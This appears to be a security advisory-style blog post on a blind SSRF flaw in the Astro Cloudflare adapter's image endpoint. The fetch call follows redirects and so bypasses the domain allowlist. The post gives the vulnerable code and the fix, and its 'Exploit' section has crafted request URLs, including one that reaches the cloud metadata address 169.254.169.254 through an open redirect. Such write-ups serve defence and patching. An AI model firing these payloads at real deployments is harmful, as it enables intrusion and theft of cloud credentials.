Listen to this Post
How This CVE Works
The vulnerability exists because a `fetch()` call in `packages/integrations/cloudflare/src/utils/image-binding-transform.ts` (line 28) uses the default `redirect: ‘follow’` behavior. This allows the Cloudflare Worker to automatically follow HTTP redirects to any arbitrary URL, completely bypassing the `isRemoteAllowed()` domain allowlist check which only validates the initial URL.
Specifically, the problematic code is:
const content = await (isRemotePath(href) ? fetch(imageSrc) : assets.fetch(imageSrc));
It is missing the crucial `{ redirect: ‘manual’ }` option. In contrast, three other image fetch paths in the codebase correctly implement this safety mechanism:
– `image-passthrough-endpoint.ts:23` → `fetch(href, { redirect: ‘manual’ })`
– `assets/endpoint/shared.ts:11` → `fetch(src, { redirect: ‘manual’ })`
– `assets/utils/remoteProbe.ts:53` → `fetch(url, { redirect: ‘manual’ })`
An attacker can exploit this by finding an open redirect on an allowed domain and crafting a request like:
/_image?href=https://allowed-cdn.com/redirect?url=http://internal-service/`
The Worker will follow the 302 redirect to the unauthorized internal service, leading to a blind Server-Side Request Forgery (SSRF). This issue is an incomplete fix for the original GHSA-qpr4-c339-7vq8 and was confirmed on the HEAD revision.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Astro Cloudflare Adapter
Version: Up to HEAD
Vulnerability: SSRF via Redirection
Severity: High
Date: 2026-04-23
<h2 style="color: blue;">Prediction: 2026-05-30 (Estimated)</h2>
<h2 style="color: blue;">Analytics under What Undercode Say</h2>
Here is a practical simulation of the vulnerability using `curl` and Node.js to demonstrate how the missing `redirect: 'manual'` leads to SSRF.
Simulate the vulnerable fetch (default follows redirects) curl -i "http://allowed-domain.com/_image?href=http://allowed-domain.com/redirect?url=http://internal-service:8080/admin" Expected result: The response shows content from the internal service, bypassing the domain allowlist.
// Node.js script to simulate the Cloudflare Worker's vulnerable behavior
const fetch = require('node-fetch');
// Simulating the vulnerable fetch (default follows redirects)
async function vulnerableFetch() {
const url = 'http://allowed-domain.com/img.jpg'; // Redirects to http://internal-service/secret
const response = await fetch(url);
console.log('Vulnerable: Fetched internal data:', await response.text());
}
// Secure implementation that should be used
async function secureFetch() {
const url = 'http://allowed-domain.com/img.jpg';
const response = await fetch(url, { redirect: 'manual' });
if (response.status === 302) {
console.log('Redirect detected, internal service not hit');
}
}
<h2 style="color: blue;">Exploit</h2>
1. Identify an allowed domain that has an open redirect vulnerability (e.g.,https://allowed-cdn.com/redirect?url=…`).
2. Craft a malicious URL targeting the worker’s image endpoint:
https://victim.workers.dev/_image?href=https://allowed-cdn.com/redirect?url=http://169.254.169.254/latest/meta-data/
3. Send the request. The Cloudflare Worker will follow the 302 redirect and fetch the internal metadata service, bypassing the domain allowlist.
Protection from this CVE
Apply the correct fix by adding the `{ redirect: ‘manual’ }` option to the vulnerable `fetch` call:
const content = await (isRemotePath(href) ? fetch(imageSrc, { redirect: 'manual' }) : assets.fetch(imageSrc));
Additionally, upgrade to the latest patched version of `@astrojs/cloudflare` (12.6.6 or higher) when available, and consider implementing a proper outbound request validation and URL allowlist.
Impact
- Blind SSRF: Attackers can probe internal services, cloud metadata endpoints, and other unauthorized resources.
- Data Exfiltration: Sensitive internal data could be exposed if the worker follows redirects to internal endpoints.
- Bypass of Security Controls: The `image.domains` and `image.remotePatterns` allowlists are completely bypassed.
- Same vulnerability class as GHSA-qpr4-c339-7vq8 (HIGH): This incomplete fix allows the same impact as the original vulnerability, including SSRF and potential XSS if a user follows a crafted link.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

